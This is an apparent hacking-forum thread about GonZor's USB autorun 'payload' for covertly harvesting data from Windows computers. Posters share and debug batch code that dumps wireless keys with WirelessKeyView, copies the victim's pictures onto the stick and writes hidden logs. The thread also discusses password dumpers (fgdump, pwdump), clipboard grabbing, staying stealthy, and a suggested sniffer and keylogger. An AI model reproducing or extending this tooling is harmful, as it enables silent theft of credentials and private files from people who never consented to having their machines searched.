Jump to content

~Gozor~ Finished Payload


setzer1411

Recommended Posts

Thanks Gonzor.

Could be interesting for next versions add some features like try to catch domain passords, (I don't know if this could be possible) or install any kind of sniffer for to get "on the fly" passwords.

another idea its to add a Keylogger...

what do you think about?

The "sniffer" is possible, I made something similar a while back and then just used sniffpass to filter the raw packets. The problem is the need to silently install WinPcap. I don't like the idea of key loggers and I don't think I will be adding one to my payload.

Link to comment
Share on other sites

  • Replies 220
  • Created
  • Last Reply

Top Posters In This Topic

darkjoker, I received that error a few times, but mainly in a media centre PC. What OS gives you that? A google search seems to show results for all kinds of USB devices, and therefore I do not think its the payload that gives that problem.

Erdnase, can I guess where you got your nickname from? Anything to do with S.W.Erdnase's expert at the card table?

Link to comment
Share on other sites

I also get the

"Windows - No disk

Exception Processing Message c00000013 Parameters 75b4bf7c 75b4bf7c" -error, and it dosn't disappear until ive clicked any alternatiev like 10 times.

The log is written, but it isn't very stealth when you get that error...

Win XP, sp2

Cruzer Titanium 2 GB (u3)

Link to comment
Share on other sites

Some websites regarding this error:

http://wook.wordpress.com/2007/06/25/excep...6bf9c-75b6bf9c/

http://forums.techguy.org/business-applica...ocessing-3.html

http://my.opera.com/opera-usb/forums/topic.dml?id=187458

Seems something to do with Norton and/or quicktime.

Can everyone who is getting this error please tell me what AV they have (if any), and their status with quicktime being installed?

Link to comment
Share on other sites

Hehe, funny is the fact that I also have been into magic. Seems like magicians have a strong attraction to hak5 :lol:

OnT: I do not have Norton or any other Symantech software but I do have quicktime installed.

I'm so sad that I get this error message, otherwise this would be the perfect payload for me.

Really hope Gonzor finds out what's going on and upload a stable and non-bugging version soon.

Keep up the good work!

Link to comment
Share on other sites

Whoa. All magicians in the house, give me your MSN Messenger (preferably, or iChat/AIM) addresses !

Sorry, for this offtopic stuff.

Me and Gonzor are working on a new part of the payload. I wont give much away, I'll let Gonzor do that, but it seems to be quite useful, and I'm sure more will be told as we develop it.

Link to comment
Share on other sites

@ GonZor

Was wondering if you or anyone could help me with something. I'm looking at your go.bat file and it is coded very nicely. A bit more complex then the original switchblade.

Say I want to have my usb stick (memorex mini 256 travel drive) just have one job to do, to dump wireless keys. I flash the drive with the universal customizer with a file to autorun wifi.bat and including in that file:

Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1

echo **********[Dump Wireless Key]******* >> ....Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1

  .wkv.exe /stext "....Documentslogfiles%computername%_wk.log" >> ....Documentslogfiles%computername%.log 2>&1

  copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_wk.log* ....Documentslogfiles%computername%.log  >> nul

  del /f /q "....Documentslogfiles%computername%_wk.log" >nul

The U3 Partition is setup as follows:

autorun.ini [tell's to run autoexec.bat]

autoexec.bat [tells to run FilesAutoRun.bat]

Files Dir. Contents:

FilesAutoRun.bat [call's wifi.bat]

Fileswifi.bat

Fileswkv.exe

My problem is it will not write to the removable part of the drive for nothing in the world. I'm I'm sure it is something with the path part of the code. I've tried changing it to:

..

....

..

Still no luck. Any suggestions? Anybody?

Link to comment
Share on other sites

You need to detect where the flash partition is mapped. Looking at my go.bat you will notice that I have done this by searching for a dat file which is on the flash partition. Normally you will need to create the file manually but SBConfig.exe does this for you when you use my payload.

:: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
    IF EXIST %%i:NUL.EXT (
                :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC
        IF EXIST %%i:SystemSRCdrv.dat (
        SET fd=%%i:System
            )
        )
)

:: CREATE LOG DIRECTORY
    IF NOT EXIST %fd%Logs%computername% (
        MD %fd%Logs%computername%
        )
:: COUNT NUMBER OF PREVIOUS LOGS FROM THIS COMPUTER SO THAT WE DO NOT OVERWRITE A LOG
    DIR /a-d /s "%fd%Logs%computername%" | FIND /c ".log" > "%fd%SRC###"
    SET /p count=<"%fd%SRC###"
:: SET LOG PATH
    SET log="%fd%Logs%computername%%computername%-[%count%].log"

Create a file on your flash partition SystemSRCdrv.dat.  Place that at the top of your go.bat, now when you refer to your log file use %log%, this will expand to X:SystemLogs%computername%%computername%-[%count%].log where X is the flash drive letter and count is the amount of logs for that computer in the folder.

Link to comment
Share on other sites

Nice job! I'm doing some tweaks to it now and compiling the batch files to executables, etc.  But one thing struck me as odd and most likely it's my relatively vacant use of batch files.  You seem to use the " mark singularly.

such as:

SET U3="%%i:SRC 

or

IF EXIST %include%1. dat" (

What is the reason for this? typically I've seen the use of the as an escape character and I'm used to seeing the " being used in pairs to enclose items with spaces or use literal meaning. 

Just curious.

Link to comment
Share on other sites

In certain situations you'll notice I do use " in pairs, and ultimately they end up being used in pairs anyway. Generally If I am setting a folder path I will use a single " at the beginning but if I am setting a path to a file I will enclose it in " marks (I know that makes no sense but you will have to forgive me I have had no sleep)

SET include="G:SRCInclude

IF EXIST %include%0.dat"

When the second line is expanded it will look like this

"G:SRCInclude0.dat"

Note the " on either end, If I were to enclose each in " like so

SET include="G:SRCInclude"

IF EXIST "%include%0.dat"

When the second line is expanded it will look like this, and fail

""G:SRCInclude"0.dat"

To simplify my code I could get away without using any " for this situation but it is just a habit I have picked up.

Sorry about the rough quick explanation, If it doesn't make sense I can attempt another explanation after I've had some sleep.

I'm doing some tweaks to it now and compiling the batch files to executables, etc.

Id love to take a look at the tweaks you've made, as well as the executable. What language?

Link to comment
Share on other sites

Ok GonZor,

I'm really trying to understand this part of your code and I think I got it.

:: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED

FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (

Searches every drive letter for possible removable flash drive

             

IF EXIST %%i:NUL.EXT

(

Searches for the drive letter defined as %%i with a null value extension

               

:: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC
        IF EXIST %%i:SystemSRCdrv.dat (
        SET fd=%%i:System
            )

Looks for a specific file in order to identify the drive in a directory SystemSRCdrv.dat

If that's the case what exactly is fd in "SET fd=%%iSystem"

Link to comment
Share on other sites

In certain situations you'll notice I do use " in pairs, and ultimately they end up being used in pairs anyway. Generally If I am setting a folder path I will use a single " at the beginning but if I am setting a path to a file I will enclose it in " marks (I know that makes no sense but you will have to forgive me I have had no sleep)

SET include="G:SRCInclude

IF EXIST %include%0.dat"

When the second line is expanded it will look like this

"G:SRCInclude0.dat"

Note the " on either end, If I were to enclose each in " like so

SET include="G:SRCInclude"

IF EXIST "%include%0.dat"

When the second line is expanded it will look like this, and fail

""G:SRCInclude"0.dat"

To simplify my code I could get away without using any " for this situation but it is just a habit I have picked up.

Sorry about the rough quick explanation, If it doesn't make sense I can attempt another explanation after I've had some sleep.

I'm doing some tweaks to it now and compiling the batch files to executables, etc.

Id love to take a look at the tweaks you've made, as well as the executable. What language?

It makes perfect sense. I just didn't realize that you could do that. I'm used to " denoting a string data type and that it has to have a closing ". Or in some case 3 " which what I expected to see in your code. But that tends to  muck things up so instead I'll use chr(34) or equivalent and concatenation.

I guess the batch file environment is more forgiving being an interpretated language but it makes the syntax highlighting in ExeScript goofing.

That's what I'm using to compile the batches (ExeScript). Albeit it's still just a batch file with a exe wrapper. Not a real executable, yet.

One thing I've done is changed the layout for the log file:

ECHO +-----------------------------------+ >> %log% 2>&1
ECHO |          [System info]            | >> %log% 2>&1
ECHO +-----------------------------------+ >> %log% 2>&1

I find the above easier on the eyes then the old ***** method

I'm also going to add in a safety file, time-date stamp, grab clipboard contents and other minor tweaks. I'll post when its done.

The one thing I do like is that you still have launchpad functionality and the tools are on the CDROM partition rather then flash. I'm also going to verify fgdump as I've never gotten that to work and used an older pwdump instead.

Link to comment
Share on other sites

Found the following issues

| was being used as a piped command where I think your intention was for it to be a pipe character.

If you have a multi-card usb hub or other usb holder with no disk, the for loop will cause errors to be displayed to the user about "no disk present" abort,retry,fail

Count script sometimes returns "volume in drive d is removable" (where d is variable) this screws up the file name and you get

computername - [volume in drive d is removable].log

I'm investigating root cause.

Link to comment
Share on other sites

@ GonZor,

Using your script with file.exe and it isn't working am I doing something wrong?

@echo off

:: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
    :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC
    IF EXIST %%i:SystemSRCdrv.dat (
        SET fd=%%i:SystemSRC
            )
        )


:: CREATE LOG DIRECTORY
    IF NOT EXIST %fd%Logs%computername% (
        MD %fd%Logs%computername%
        )
:: COUNT NUMBER OF PREVIOUS LOGS FROM THIS COMPUTER SO THAT WE DO NOT OVERWRITE A LOG
    DIR /a-d /s "%fd%Logs%computername%" | FIND /c ".log" > "%fd%SRC###"
    SET /p count=<"%fd%SRC###"
:: SET LOG PATH
    SET log="%fd%Logs%computername%%computername%-[%count%].log"

:: CREATE PIC DIRECTORY
    IF NOT EXIST %fd%Documents%computername%Pictures (
        MD %fd%Documents%computername%Pictures
        )

file.exe /A:C "%Documents and Settings%%username%My Documents*.jpg" "Documents%computername%Pictures" /I /P

file.exe /A:C "%Documents and Settings%%username%My Documents*.bmp" "Documents%computername%Pictures" /I /P

file.exe /A:C "%Documents and Settings%%username%My Documents*.gif" "Documents%computername%Pictures" /I /P

Link to comment
Share on other sites

@ GonZor,

Using your script with file.exe and it isn't working am I doing something wrong?

To be honest I have never used file.exe so I am unfamiliar with how its used but looking at your code, I am going to assume the last three lines should look like this:

file.exe /A:C "%Documents and Settings%%username%My Documents*.jpg" "%fd%Documents%computername%Pictures" /I /P

file.exe /A:C "%Documents and Settings%%username%My Documents*.bmp" "%fd%Documents%computername%Pictures" /I /P

file.exe /A:C "%Documents and Settings%%username%My Documents*.gif" "%fd%Documents%computername%Pictures" /I /P

assuming the syntax is file.exe /A:C <source> <destination> /I /P, this should work fine now. the problem was you were saying the destination was on the CD partition (which you obviously cant write to a CDFS partition).

Link to comment
Share on other sites

Hey Gonzor,

    Just wanna report in some personal bug feedback. 

I am getting this message:

======================

Windows - No Disk                          X

======================

X    There is no disk in the drive.

      Please insert a disk into drive.

|Cancel|  |Try Again|  |Continue|

And it is the cmd. exe process that is running during this error.  This also occurs when Netpass runs (even when netpass is disabled [WTF?])

Otherwise, the rest of the payload works like a charm.  Hacksaw works perfectly - just as long as I log in and stuff like you said.  Keep up the good work!

Link to comment
Share on other sites

@ GonZor,

Ahhh, makes total sense. Thanks man really appreciate it. I'm gonna definitely try that out tonight:)

Oh yea I forgot, the logs, it does create log folder's, but doesn't actually create any logs. It creats the folders in the SRC directory, but I'll mess around with that tonight also.

Link to comment
Share on other sites

Just one ? a little confused. Still not working, but it could just be file.exe issue, but according to the following code:

@echo off

:: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
    :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC
    IF EXIST %%i:SystemSRCdrv.dat (
        SET fd=%%i:SystemSRC
            )
        )

It looks to me like your defining the flash partition as drive i: I don't see how it gets defined as %fd%

Link to comment
Share on other sites

It looks to me like your defining the flash partition as drive i: I don't see how it gets defined as %fd%

Sorry if this makes no sense at all, just got home from a party. I'll try to explain each line individually.

:: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (

FOR %variable IN (set) DO <command>

%variable specifies a single letter variable (my chosen variable %%i)

(set) specifies what the variable will be each time (in this case the alphabet)

<command> specifies the command to do with each variable in the set (in this case I used an open bracket just for readability)

    :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC
    IF EXIST %%i:SystemSRCdrv.dat (

The first command for each variable, IF EXIST <file> <command>

<file> specifies the file to search for (in this case we are searching for the file SystemSRCdrv.dat but this can be changed to any file)

<command> specifies the command to do if the file exists (once again I used an open bracket for readability, I find it easier)

        SET fd=%%i:SystemSRC

This is the command to be completed once the file is found to exist, SET <variable>=<string>

<variable> specifies the variable that we will later call on to expand into the string (in this case the variable is fd and is later called as %fd%)

<string> specifies what we want the variable to expand to when it is called (in this case we want it to expand to the drive letter & the folder path SystemSRC)

        )
        )

These are just the closing brackets to both statements, first closing the IF EXIST command and second closing the FOR command.

This could be written as one line but for readability I use the brackets. I hope that made sense but time now for some sleep  :shock:

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...